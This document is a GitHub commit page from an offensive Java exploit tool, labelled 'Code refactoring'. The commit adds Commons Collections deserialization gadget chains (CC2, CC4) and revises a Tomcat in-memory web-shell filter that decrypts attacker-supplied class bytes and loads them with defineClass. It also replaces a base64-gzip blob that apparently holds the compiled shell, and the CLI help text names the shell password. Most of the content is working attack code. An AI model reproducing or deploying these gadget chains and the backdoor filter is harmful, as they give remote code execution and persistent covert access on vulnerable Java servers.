Skip to content

Commit

Permalink
Code refactoring
Browse files Browse the repository at this point in the history 
Signed-off-by: XhstormR <[email protected]>
  • Loading branch information
@XhstormR
XhstormR committed Jul 15, 2020
1 parent 520562a commit 17b6de6
Show file tree
Hide file tree
Showing 9 changed files with 87 additions and 53 deletions.
2 changes: 1 addition & 1 deletion assets/run.bat
View file
Original file line number Diff line number Diff line change
@@ -1 +1 @@
busybox gzip -9 -c -k FilterImpl.class | busybox base64 | busybox tr -d "\n" > 123.txt
busybox gzip -9 -c -k FilterImpl.class | busybox base64 | busybox tr -d "\n" > FilterImpl.class.txt
6 changes: 1 addition & 5 deletions src/main/java/com/xhstormr/app/TomcatBehinderFilter.java
View file
Original file line number Diff line number Diff line change
Expand Up @@ -42,11 +42,7 @@ public void doFilter(ServletRequest request, ServletResponse response, FilterCha
c.init(2, new SecretKeySpec(session.getAttribute("u").toString().getBytes(), "AES"));
byte[] bytes = c.doFinal(Base64.getDecoder().decode(req.getReader().readLine()));

Method defineClass = ClassLoader.class.getDeclaredMethod("defineClass", byte[].class, int.class, int.class);
defineClass.setAccessible(true);
Class<?> clazz = (Class<?>) defineClass.invoke(new TomcatBehinderFilter(), bytes, 0, bytes.length);

clazz.newInstance().equals(new Object[]{req, rsp});
new TomcatBehinderFilter().defineClass(null, bytes, 0, bytes.length).newInstance().equals(new Object[]{req, rsp});
return;
} catch (Exception e) {
e.printStackTrace();
Expand Down
2 changes: 1 addition & 1 deletion src/main/java/com/xhstormr/app/TomcatBehinderFilterTemplatesImpl.java
View file
Original file line number Diff line number Diff line change
Expand Up @@ -16,7 +16,7 @@ public class TomcatBehinderFilterTemplatesImpl extends AbstractTranslet {

static {
try {
String base64 = "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";
String base64 = "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";
byte[] bytes = ungzip(Base64.getDecoder().decode(base64));
ClassLoader classLoader = Thread.currentThread().getContextClassLoader();
Method defineClass = ClassLoader.class.getDeclaredMethod("defineClass", byte[].class, int.class, int.class);
Expand Down
4 changes: 4 additions & 0 deletions src/main/java/com/xhstormr/app/TomcatShellFilter.java
View file
Original file line number Diff line number Diff line change
Expand Up @@ -83,3 +83,7 @@ public void init(FilterConfig filterConfig) {
public void destroy() {
}
}

/*
https://mp.weixin.qq.com/s/whOYVsI-AkvUJTeeDWL5dA
*/
70 changes: 70 additions & 0 deletions src/main/kotlin/com/xhstormr/app/Chain.kt
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,70 @@
package com.xhstormr.app

import com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter
import java.util.PriorityQueue
import javax.xml.transform.Templates
import org.apache.commons.collections4.Transformer
import org.apache.commons.collections4.comparators.TransformingComparator
import org.apache.commons.collections4.functors.ChainedTransformer
import org.apache.commons.collections4.functors.ConstantTransformer
import org.apache.commons.collections4.functors.InstantiateTransformer
import org.apache.commons.collections4.functors.InvokerTransformer

enum class Chain {

CommonsCollections2Chain {
override fun generate(payload: Class<*>): Any {
val templates = Gadgets.createTemplatesImpl(payload)
// mock method name until armed
val transformer = InvokerTransformer<Any, Any>(
"toString",
arrayOfNulls(0),
arrayOfNulls(0)
)

// create queue with numbers and basic comparator
val queue = PriorityQueue(2, TransformingComparator(transformer))
// stub data for replacement later
queue.add(1)
queue.add(1)

// switch method called by comparator
transformer.setFieldValue("iMethodName", "newTransformer")

// switch contents of queue
val queueArray = queue.getFieldValue("queue") as Array<Any>
queueArray[0] = templates
queueArray[1] = 1
return queue
}
},

CommonsCollections4Chain {
override fun generate(payload: Class<*>): Any {
val templates = Gadgets.createTemplatesImpl(payload)
val constant = ConstantTransformer<Any, Any>(String::class.java)

// mock method name until armed
var paramTypes: Array<Class<*>> = arrayOf(String::class.java)
var args: Array<Any> = arrayOf("foo")
val instantiate = InstantiateTransformer<Any>(paramTypes, args)

// grab defensively copied arrays
paramTypes = instantiate.getFieldValue("iParamTypes") as Array<Class<*>>
args = instantiate.getFieldValue("iArgs") as Array<Any>
val chain = ChainedTransformer<Any>(constant as Transformer<Any, Any>, instantiate as Transformer<Any, Any>)

// create queue with numbers
val queue = PriorityQueue(2, TransformingComparator(chain))
queue.add(1)
queue.add(1)

constant.setFieldValue("iConstant", TrAXFilter::class.java)
paramTypes[0] = Templates::class.java
args[0] = templates
return queue
}
};

abstract fun generate(payload: Class<*>): Any
}
33 changes: 0 additions & 33 deletions src/main/kotlin/com/xhstormr/app/CommonsCollections2ObjectPayload.kt
View file

This file was deleted.

14 changes: 8 additions & 6 deletions src/main/kotlin/com/xhstormr/app/Main.kt
View file
Original file line number Diff line number Diff line change
Expand Up @@ -10,23 +10,25 @@ import java.util.Base64

object App : CliktCommand(printHelpOnEmptyArgs = true) {

private val chain by option().enum<Chain>().required()

private val payload by option(help = "Password: xhstormr").enum<Payload>().required()

override fun run() {
// exploit(CommonsCollections2ObjectPayload, clazz<TomcatShellFilterTemplatesImpl>())
// exploit(CommonsCollections2ObjectPayload, clazz<TomcatBehinderFilterTemplatesImpl>())
// exploit(Chain.CommonsCollections2Chain, clazz<TomcatShellFilterTemplatesImpl>())
// exploit(Chain.CommonsCollections2Chain, clazz<TomcatBehinderFilterTemplatesImpl>())

CommonsCollections2ObjectPayload
.getObject(payload.clazz)
chain
.generate(payload.clazz)
.serialize(System.out)
}
}

fun main(args: Array<String>) = App.main(args)

fun exploit(payload: ObjectPayload, clazz: Class<*>) {
fun exploit(chain: Chain, payload: Class<*>) {
try {
val any = payload.getObject(clazz)
val any = chain.generate(payload)
println(any)
ObjectInputStream(ByteArrayInputStream(any.serialize()))
.readObject()
Expand Down
5 changes: 0 additions & 5 deletions src/main/kotlin/com/xhstormr/app/ObjectPayload.kt
View file

This file was deleted.

4 changes: 2 additions & 2 deletions src/main/kotlin/com/xhstormr/app/Payload.kt
View file
Original file line number Diff line number Diff line change
@@ -1,6 +1,6 @@
package com.xhstormr.app

enum class Payload(val clazz: Class<*>) {
CommonsCollections2ForTomcatShell(clazz<TomcatShellFilterTemplatesImpl>()),
CommonsCollections2ForTomcatBehinder(clazz<TomcatBehinderFilterTemplatesImpl>());
TomcatShell(clazz<TomcatShellFilterTemplatesImpl>()),
TomcatBehinder(clazz<TomcatBehinderFilterTemplatesImpl>());
}

0 comments on commit 17b6de6

Please sign in to comment.